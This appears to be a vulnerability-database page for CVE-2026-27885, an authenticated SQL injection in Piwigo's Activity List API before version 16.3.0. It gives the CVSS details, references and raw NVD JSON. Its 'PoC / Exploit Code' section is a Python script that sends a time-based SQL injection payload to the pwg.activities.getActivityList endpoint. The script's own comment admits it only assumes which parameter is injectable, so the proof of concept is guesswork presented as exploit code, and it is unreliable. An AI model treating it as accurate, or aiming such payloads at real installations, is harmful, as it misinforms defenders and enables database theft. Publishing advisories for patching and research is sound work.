CVE-2026-27885

Description

Piwigo is an open source photo gallery application for the web. Prior to version 16.3.0, a SQL Injection vulnerability was discovered in Piwigo affecting the Activity List API endpoint. This vulnerability allows an authenticated administrator to extract sensitive data from the database, including user credentials, email addresses, and all stored content. This issue has been patched in version 16.3.0.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* - VULNERABLE

Piwigo < 16.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL and Admin Session
target_url = "http://localhost/piwigo/ws.php?format=json"
admin_cookie = {"pwg_id": "your_admin_session_cookie"}

# Vulnerable parameter in Activity List API
# Assuming 'order' or similar parameter is injectable
payload = {
    "method": "pwg.activities.getActivityList",
    "order": "id ASC; SELECT SLEEP(5)-- "
}

try:
    response = requests.post(target_url, cookies=admin_cookie, data=payload)
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability confirmed: Time-based SQL injection detected.")
    else:
        print("[-] Vulnerability not detected or payload incorrect.")
    print("Response:", response.text)
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27885
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27885
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27885/
[4] VulDB https://vuldb.com/cve/CVE-2026-27885
[5] https://github.com/Piwigo/Piwigo/commit/c172d284e11eab4a5dbadd2844d26f734d5c8c72
[6] https://github.com/Piwigo/Piwigo/security/advisories/GHSA-wfmr-9hg8-jh3m
[7] https://piwigo.org/release-16.3.0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27885", "sourceIdentifier": "[email protected]", "published": "2026-04-03T22:16:26.173", "lastModified": "2026-04-09T21:15:10.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Piwigo is an open source photo gallery application for the web. Prior to version 16.3.0, a SQL Injection vulnerability was discovered in Piwigo affecting the Activity List API endpoint. This vulnerability allows an authenticated administrator to extract sensitive data from the database, including user credentials, email addresses, and all stored content. This issue has been patched in version 16.3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.3.0", "matchCriteriaId": "3502BA46-5475-47BC-BA8F-F9456A836F1A"}]}]}], "references": [{"url": "https://github.com/Piwigo/Piwigo/commit/c172d284e11eab4a5dbadd2844d26f734d5c8c72", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Piwigo/Piwigo/security/advisories/GHSA-wfmr-9hg8-jh3m", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://piwigo.org/release-16.3.0", "source": "[email protected]", "tags": ["Release Notes"]}]}}